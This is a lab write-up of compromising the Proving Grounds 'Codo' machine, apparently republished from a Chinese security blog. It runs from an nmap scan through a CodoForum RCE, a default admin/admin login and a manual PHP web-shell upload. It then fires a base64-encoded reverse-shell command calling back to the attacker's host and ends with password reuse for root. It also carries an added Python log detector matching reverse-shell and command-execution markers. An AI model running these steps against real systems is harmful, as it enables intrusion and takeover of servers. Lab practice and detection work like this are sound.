PG_Codo

admin, 2025-06-03 10:02:50

Information gathering:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.164.23
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-19 11:30 CST
Nmap scan report for 192.168.164.23
Host is up (0.0033s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: All topics | CODOLOGIC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.39 - 3.2 (86%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   2.61 ms 192.168.45.1
2   2.59 ms 192.168.45.254
3   2.83 ms 192.168.251.1
4   3.22 ms 192.168.164.23
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.68 seconds

Apart from SSH, only HTTP on port 80 is open, so take a look at it.

searchsploit codoforum

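There is an RCE exploit. After copying it and trying it, it turns out to need a username and password; a first guess of admin/admin logged straight into the system.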


The script reported that the upload failed, so try it manually.

[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from http://192.168.164.23//sites/default/assets/img/attachments/[file.php])

Success.


Reverse shell

shell.php?shell=system('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yMjIvMzAwMCAwPiYx" |base64 -d | bash');
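
An added detection example, not part of the original write-up: it scans Apache access-log lines for script files requested from the attachments directory named in the exploit's message, and for command-execution markers in the query string. The log format (Apache common/combined), the marker list, the function names and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, unquote_plus

# Upload directory named in the exploit's error message on this page.
UPLOAD_DIR = "/sites/default/assets/img/attachments/"
# Extensions a PHP-enabled Apache commonly executes (assumption; match your handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Heuristic markers of shell commands passed in a query string (assumed list).
CMD_MARKERS = re.compile(r"system\(|base64\s+-d|\|\s*(ba)?sh\b|/dev/tcp/", re.I)
# Apache common/combined log: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def analyze(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    # Split by hand: urlsplit() would parse a leading "//sites" as a host name.
    raw_path, _, raw_query = target.partition("?")
    # Decode once, collapse repeated slashes, resolve "." and ".." segments.
    path = posixpath.normpath(re.sub(r"/{2,}", "/", unquote(raw_path)))
    query = unquote_plus(raw_query)
    reasons = []
    if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
        reasons.append("script requested from upload directory")
    if CMD_MARKERS.search(query):
        reasons.append("command-execution marker in query string")
    if not reasons:
        return None
    return {"ip": ip, "method": method, "path": path,
            "status": int(status), "reasons": reasons}

def scan(lines):
    """Analyze every log line and keep only the findings."""
    return [f for f in map(analyze, lines) if f]

# Constructed sample log lines (documentation addresses, not from the original page).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2025:11:40:01 +0800] "GET /sites/default/assets/img/attachments/logo.png HTTP/1.1" 200 5120',
    '192.0.2.10 - - [19/Feb/2025:11:41:12 +0800] "GET //sites/default/assets/img/attachments/shell.php?shell=system(%27id%27)%3B HTTP/1.1" 200 54',
    '192.0.2.11 - - [19/Feb/2025:11:42:30 +0800] "GET /index.php?u=/topics HTTP/1.1" 200 8021',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a script under the upload directory means the web server executed or served it; denying script handlers for that directory in the Apache configuration removes the need to rely on detection alone.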

Checked the SUID binaries and none of them can be used for privilege escalation, so upload and run linpeas.sh.

Found a password in a PHP configuration file; try switching users with it.


Switching to the regular user failed.


Switching to root worked immediately.


Originally published on the WeChat official account EuSRC安全实验室 (EuSRC Security Lab): PG_Codo

Posted by admin on 2025-06-03 10:02:50. Permalink (CN-SEC中文网): https://cn-sec.com/archives/3872130.html